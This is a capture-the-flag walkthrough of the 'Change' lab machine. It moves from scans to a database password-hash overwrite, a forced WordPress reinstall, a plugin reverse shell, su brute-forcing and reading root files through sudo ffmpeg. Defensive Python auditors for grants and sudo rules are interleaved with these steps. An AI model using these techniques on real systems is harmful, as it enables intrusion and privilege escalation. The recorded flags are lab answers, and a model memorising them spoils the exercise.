Change

Target description

QQ group: 660930334

I. Host discovery

┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:29 CST
Nmap scan report for 192.168.2.1
Host is up (0.00060s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00040s latency).
MAC Address: 08:00:27:B5:D3:0B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.60
Host is up (0.00077s latency).
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

Target IP: 192.168.2.60

II. Port scanning

1. Full port scan

┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap --min-rate 10000 -p- 192.168.2.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:29 CST
Nmap scan report for 192.168.2.60
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

Open ports: 22, 80, 3306

2. Service and version scan

┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3306 192.168.2.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:30 CST
Nmap scan report for 192.168.2.60
Host is up (0.00078s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.5.23-MariaDB-0+deb11u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.5.23-MariaDB-0+deb11u1
| Thread ID: 32
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolNew, Speaks41ProtocolOld, InteractiveClient, Support41Auth, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, SupportsCompression, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsTransactions, ODBCClient, LongColumnFlag, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: J"e[vcjk\i{OYRlJlb)A
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

3. UDP port scan

┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap -sU --top-ports 100 192.168.2.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:31 CST
Nmap scan report for 192.168.2.60
Host is up (0.0017s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 108.24 seconds

No open UDP ports were found (68/udp only shows as open|filtered, which is the DHCP client).

III. Web penetration

Visiting port 80 tells us to use the host name change.dsz; after adding a hosts entry and visiting it, we get a login form.

The page source contains the database login credentials.

IV. MySQL database

Connect to the database:

┌──(root㉿kali)-[/miao/maze-sec/change]
└─# mysql -h 192.168.2.60 -P3306 -u change -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

The client insists on TLS but the server does not support it, so skip TLS with --skip-ssl:

┌──(root㉿kali)-[/miao/maze-sec/change]
└─# mysql -h 192.168.2.60 -P3306 -u change -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

Looking at the data, there is a root user whose password is stored as a bcrypt hash:

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| changeweb |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use changeweb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [changeweb]> show tables;
+---------------------+
| Tables_in_changeweb |
+---------------------+
| users |
+---------------------+
1 row in set (0.001 sec)

MariaDB [changeweb]> select * from uers;
ERROR 1146 (42S02): Table 'changeweb.uers' doesn't exist
MariaDB [changeweb]> select * from users;
+----+----------+--------------------------------------------------------------+
| id | username | password |
+----+----------+--------------------------------------------------------------+
| 1 | root | $2y$10$EFCK8LdjkDv1W52q0bV8.OLUicO8h6kYBqU5nE1jOcSq3qQ9l5mZG |
+----+----------+--------------------------------------------------------------+
1 row in set (0.001 sec)

The current database user has all privileges on the changeweb database:

MariaDB [changeweb]> SHOW GRANTS FOR CURRENT_USER;
+-------------------------------------------------------------------------------------------------------+
| Grants for change@% |
+-------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO `change`@`%` IDENTIFIED BY PASSWORD '*526D926092550C5935871EE9117E7397F2715097' |
| GRANT ALL PRIVILEGES ON `changeweb`.* TO `change`@`%` |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.002 sec)
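
As an added defender-side check (not part of the original walkthrough), the following Python script parses the SHOW GRANTS output above and flags the three properties the rest of this chain depended on: the wildcard host, ALL PRIVILEGES on the application database, and the missing REQUIRE SSL. The sample input is the page's own output; the function names are my own.

```python
import re

# GRANT statements exactly as "SHOW GRANTS FOR CURRENT_USER" printed them on the Change box
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO `change`@`%` IDENTIFIED BY PASSWORD '*526D926092550C5935871EE9117E7397F2715097'",
    "GRANT ALL PRIVILEGES ON `changeweb`.* TO `change`@`%`",
]

# "GRANT <privs> ON <scope> TO <user>@<host> ..." with optional backtick or single-quote quoting
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"[`']?(?P<user>[^`'@]+)[`']?@[`']?(?P<host>[^`'\s]+)[`']?",
    re.IGNORECASE,
)
REQUIRE_RE = re.compile(r"\bREQUIRE\s+(SSL|X509|SUBJECT|ISSUER|CIPHER)\b", re.IGNORECASE)

def parse_grant(line):
    """Split one GRANT statement into privileges, scope, user, host and TLS requirement."""
    m = GRANT_RE.match(line.strip())
    if not m:
        return None
    return {
        "privs": [p.strip().upper() for p in m.group("privs").split(",")],
        "scope": m.group("scope").replace("`", ""),
        "user": m.group("user"),
        "host": m.group("host"),
        "require_tls": REQUIRE_RE.search(line) is not None,
    }

def audit_grants(lines):
    """Aggregate grants per account and report the weaknesses this walkthrough relied on."""
    accounts = {}
    for line in lines:
        g = parse_grant(line)
        if g is None:
            continue
        acct = accounts.setdefault(f"{g['user']}@{g['host']}",
                                   {"host": g["host"], "all_on": [], "tls": False})
        if "ALL PRIVILEGES" in g["privs"]:
            acct["all_on"].append(g["scope"])
        acct["tls"] = acct["tls"] or g["require_tls"]
    findings = []
    for who, a in accounts.items():
        if a["host"] == "%":
            findings.append(f"{who}: host wildcard '%' accepts logins from any address, not just the web server")
        for scope in a["all_on"]:
            findings.append(f"{who}: ALL PRIVILEGES on {scope} lets the app account rewrite stored password hashes")
        if not a["tls"]:
            findings.append(f"{who}: no REQUIRE SSL, so credentials and data cross port 3306 in the clear")
    return findings
```

The fix on the server side is to bind the account to the web server's address instead of `%`, grant only the statements the application needs, and add REQUIRE SSL once the server is built with TLS support.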

Try replacing the root user's password hash with one we generate ourselves (bcrypt hash produced at https://bcrypt.online/):

$2y$10$Af33bvt/ZJXZuBT/Q7l0Xu/GvoQkjPFTMTc.pEA7ipCZBBF0V9aaW // plaintext: 123456

MariaDB [changeweb]> UPDATE users SET password = '$2y$10$Af33bvt/ZJXZuBT/Q7l0Xu/GvoQkjPFTMTc.pEA7ipCZBBF0V9aaW' where username = 'root';
Query OK, 1 row affected (0.020 sec)
Rows matched: 1 Changed: 1 Warnings: 0

V. Getting a shell

Log in with root:123456.

Only the ls, rm and pwd commands can be executed; under /var/www/ there is a wordpress.change.dsz directory.

After adding a hosts entry and visiting it, the site turns out to be WordPress.

WordPress exploitation

List the directory: ls /var/www/wordpress.change.dsz/

Since rm is among the allowed commands, delete wp-config.php so that WordPress can be reinstalled:

rm /var/www/wordpress.change.dsz/wp-config.php

Visiting wordpress.change.dsz again now prompts for a fresh installation.

Database settings:

Database name: changeweb
User: change
Password: change

Set a site username and password, then log in.

Use a plugin to get a reverse shell.

Shell obtained:

┌──(root㉿kali)-[/tools/php]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.60] 41886
bash: cannot set terminal process group (466): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Change:/var/www/wordpress.change.dsz/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

www-data@Change:/home/lzh$ cat user.txt 
flag{user-a05597ed1f36976e88c2e10a74902c52}

VI. Privilege escalation

1. Escalating to lzh

In /home/lzh there is a password file .pass.txt; use it as a wordlist with suForce:

www-data@Change:/tmp$ ./suForce -ulzh -w /home/lzh/.pass.txt 
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | lzh
📖 Wordlist | /home/lzh/.pass.txt
🔎 Status | 156/201/77%/1a2b3c4d1a2b3c4d
💥 Password | 1a2b3c4d1a2b3c4d
───────────────────────────────────
tput: No value for $TERM and no -T specified

Switch to the lzh user with the password 1a2b3c4d1a2b3c4d:

www-data@Change:/tmp$ su - lzh
Password:
lzh@Change:~$ id
uid=1000(lzh) gid=1000(lzh) groups=1000(lzh)

2. Escalating to root

Check sudo privileges:

lzh@Change:~$ sudo -l
Matching Defaults entries for lzh on Change:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lzh may run the following commands on Change:
(ALL) NOPASSWD: /usr/bin/ffmpeg

lzh can run /usr/bin/ffmpeg via sudo without a password.
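
Added example, not from the original write-up: a small auditor for sudo -l output that flags the three properties of the rule above that made it dangerous (runs as root, NOPASSWD, and no argument restriction). The sample text is the page's own output; function names are mine.

```python
import re

# "sudo -l" output as captured on the Change box (user, host and rule are from the page)
SAMPLE_SUDO_L = r"""Matching Defaults entries for lzh on Change:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lzh may run the following commands on Change:
    (ALL) NOPASSWD: /usr/bin/ffmpeg
"""

# One rule line: "(runas) TAG: TAG: /path/to/cmd [args]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_rules(text):
    """Return the command rules listed after the 'may run the following commands' header."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            cmd, _, args = m.group("cmd").partition(" ")
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": cmd, "args": args.strip()})
    return rules

def audit_sudo_rules(rules):
    """Flag the properties that turned the ffmpeg rule on this box into a root-level file read."""
    findings = []
    for r in rules:
        label = f"{r['cmd']} as ({r['runas']})"
        runas_user = r["runas"].split(":")[0].strip().upper()  # "(ALL : ALL)" -> "ALL"
        if runas_user in ("ALL", "ROOT"):
            findings.append(f"{label}: may be run as root")
        if "NOPASSWD" in r["tags"]:
            findings.append(f"{label}: NOPASSWD, so a hijacked session needs no re-authentication")
        if not r["args"]:
            findings.append(f"{label}: arguments unrestricted, so every option of the binary, "
                            "including ones that read or write files, is allowed")
    return findings
```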

ffmpeg privilege escalation

Method 1: dump the file contents through ffmpeg's error message

sudo ffmpeg -f concat -i /root/root.txt

lzh@Change:~$ sudo ffmpeg -f concat -i /root/root.txt
ffmpeg version 4.3.7-0+deb11u1 Copyright (c) 2000-2024 the FFmpeg developers
built with gcc 10 (Debian 10.2.1-6)
configuration: --prefix=/usr --extra-version=0+deb11u1 --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --enable-avresample --disable-filter=resample --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libdav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librabbitmq --enable-librsvg --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libsrt --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opencl --enable-opengl --enable-sdl2 --enable-pocketsphinx --enable-libmfx --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-shared
libavutil 56. 51.100 / 56. 51.100
libavcodec 58. 91.100 / 58. 91.100
libavformat 58. 45.100 / 58. 45.100
libavdevice 58. 10.100 / 58. 10.100
libavfilter 7. 85.100 / 7. 85.100
libavresample 4. 0. 0 / 4. 0. 0
libswscale 5. 7.100 / 5. 7.100
libswresample 3. 7.100 / 3. 7.100
libpostproc 55. 7.100 / 55. 7.100
[concat @ 0x559cd6343e40] Line 1: unknown keyword 'flag{root-8d4727897d0129417e1f3f91d1474c1c}'
/root/root.txt: Invalid data found when processing input

Method 2: create a white-background video with the text file drawn in the middle of the frame

sudo ffmpeg -f lavfi -i color=c=white:s=640x480:d=5 \
  -vf "drawtext=textfile=/root/root.txt:x=(w-text_w)/2:y=(h-text_h)/2:fontsize=24:fontcolor=black" \
  -c:v libx264 -pix_fmt yuv420p output.mp4

ROOT FLAG

flag{root-8d4727897d0129417e1f3f91d1474c1c}

Change
http://miao-sec.github.io/Maze-sec/Change/
Author: Miao
Published: July 22, 2025
License: BY-MIAO